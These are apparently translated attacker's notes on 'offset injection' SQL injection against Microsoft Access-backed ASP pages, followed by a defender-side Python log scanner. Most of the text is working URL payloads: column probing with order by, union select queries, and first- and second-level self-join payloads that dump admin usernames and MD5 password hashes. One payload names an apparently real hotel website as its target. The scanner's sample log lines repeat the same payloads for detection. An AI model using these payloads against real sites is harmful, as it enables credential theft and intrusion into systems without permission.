ACCESS offset injection notes
The principle of Access offset injection; the basic formula is:
the column count found with order by, minus twice the number of columns that the * wildcard stands for;
that is:
order by = 22
* = 6 columns
2 × * = 12 columns
22 - 12 = 10 columns
Injection point:
Determining the column count:
www.xxx.com/Newsview.asp?id=832 order by 16 page renders normally
www.xxx.com/Newsview.asp?id=832 order by 17 page returns an error
Union query:
www.xxx.com/Newsview.asp?id=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
Obtaining the display positions:
But we don't know the column names; the tool could only brute-force two of them, admin_name and admin_id, so we use Access offset injection to obtain more information.
Get the number of columns in admin (by replacing the numbers with * from the right, moving one position at a time, and checking whether the page still renders normally):
From this we learn that admin has 16-11 = 5 columns, so there are 5 fields in admin.
Now for the main topic, offset injection:
The basic formula for offset injection is: column count from order by minus the *-column count × 2. Here that is 16-5*2=6, so we start constructing the payload:
http://www.ronghuhotel.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_id=b.admin_id)
You can see that the username and MD5-hashed password are dumped directly.
We can try varying the statement to obtain more information, because the content returned by offset injection is random: the column combination gets shuffled.
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
...
There are many more; admin_name can also be changed to admin_id.
These are all first-level offsets:
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
Second-level offset:
union select 1,a.id,b.id,c.id, * from ((admin as a inner join admin as b on a.admin_name =b.admin_name) inner join admin as c on a.admin_name =c.admin_name)
PS: offset injection only applies to Access databases.
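As an added defender-side example (not part of the original notes): a small Python scanner that flags the two request shapes shown above in web-server access logs, the order by column probes and the union select ... * from (table as a inner join table as b ...) self-join, and reports the join nesting level (1 = first-level, 2 = second-level offset). The log lines are constructed for the example; IPs, paths and hostnames are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines mirroring the probe shapes discussed above
# (client IP, path and table name are placeholders, not real data).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /Newsview.asp?id=832 HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /Newsview.asp?id=832%20order%20by%2016 HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /Newsview.asp?id=832%20order%20by%2017 HTTP/1.1" 500 812
192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /Newsview.asp?id=-832+union+select+1,2,3,4,5,6,*+from+(admin+as+a+inner+join+admin+as+b+on+a.admin_id=b.admin_id) HTTP/1.1" 200 6001
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /Newsview.asp?id=-832+union+select+1,a.id,b.id,c.id,*+from+((admin+as+a+inner+join+admin+as+b+on+a.admin_name=b.admin_name)+inner+join+admin+as+c+on+a.admin_name=c.admin_name) HTTP/1.1" 200 6230
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
# Offset-injection signature: a UNION SELECT whose column list ends in a bare '*'
# taken from a self-join of one table aliased twice (same table name on both sides).
OFFSET_RE = re.compile(
    r"union\s+select\b.*\*\s*from\s*\(+\s*(?P<table>\w+)\s+as\s+\w+\s+inner\s+join\s+(?P=table)\s+as",
    re.I | re.S,
)


def classify_request(raw_line):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = REQUEST_RE.search(raw_line)
    if not m:
        return None
    status = int(m.group("status"))
    query = unquote_plus(m.group("path"))  # decode %20 and '+' before matching
    order = ORDER_BY_RE.search(query)
    if order:
        # Consecutive probes flipping from 200 to an error pinpoint the column count.
        return {"type": "order_by_probe", "columns": int(order.group(1)), "status": status}
    offset = OFFSET_RE.search(query)
    if offset:
        return {
            "type": "access_offset_injection",
            "table": offset.group("table"),
            "level": query.lower().count("inner join"),  # 1 = first-level, 2 = second-level
            "status": status,
        }
    return None


def scan_log(text):
    """Scan a whole access log and return the list of findings in order."""
    return [f for f in (classify_request(line) for line in text.splitlines()) if f]
```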